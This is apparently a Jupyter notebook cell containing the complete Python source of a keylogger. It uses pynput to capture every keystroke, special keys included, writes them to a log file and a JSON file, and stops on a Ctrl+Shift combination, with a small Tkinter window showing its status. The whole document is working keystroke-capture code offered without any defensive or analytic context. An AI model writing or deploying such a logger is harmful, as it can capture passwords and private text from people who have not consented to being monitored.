In [6]:
import json
import logging
import os
import tkinter as tk
from pynput import keyboard
# Create a directory to store the logs
if not os.path.exists("logs"):
    os.makedirs("logs")

# Configure the logging module
logging.basicConfig(filename='logs/keylogs.txt', level=logging.INFO, format='%(asctime)s [%(levelname)s]: %(message)s')

# Define a list to store keystrokes
keylogs = []

# Define the secret key combination to stop the keylogger
SECRET_KEY_COMBINATION = {keyboard.Key.ctrl_l, keyboard.Key.shift}

# Variable to check if both 'ctrl_l' and 'shift' keys are pressed
ctrl_shift_pressed = set()

def on_press(key):
    try:
        # Extract the character from the pressed key
        key_char = key.char

        # Add the pressed key to the list
        keylogs.append(key_char)

        # Log the key press
        logging.info(f'Key Pressed: {key_char}')

        # Check if the secret key combination is pressed
        if all(k in ctrl_shift_pressed for k in SECRET_KEY_COMBINATION):
            # Save the collected keystrokes to a JSON file
            with open('logs/keylogs.json', 'w') as f:
                json.dump(keylogs, f)
            return False

    except AttributeError:
        # Special keys (e.g., shift, ctrl, etc.) don't have `char` attribute
        special_key = str(key)
        keylogs.append(special_key)

        # Log the special key press
        logging.info(f'Special Key Pressed: {special_key}')

def on_release(key):
    if key in SECRET_KEY_COMBINATION:
        ctrl_shift_pressed.add(key)
    elif key == keyboard.Key.shift_r:
        # This is to handle right 'shift' key separately, as it can be released independently.
        ctrl_shift_pressed.discard(key)
    elif key == keyboard.Key.ctrl_r:
        # This is to handle right 'ctrl' key separately, as it can be released independently.
        ctrl_shift_pressed.discard(key)

# Start the keylogger
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    # Create a basic GUI window
    root = tk.Tk()
    root.title("Keylogger")

    # Add a label to display instructions
    label = tk.Label(root, text="Keylogger is running...\nPress 'Ctrl + Shift' together to stop and save logs.")
    label.pack(padx=10, pady=10)

    # Run the GUI event loop
    root.mainloop()

    # Stop the keylogger when the GUI window is closed
    listener.stop()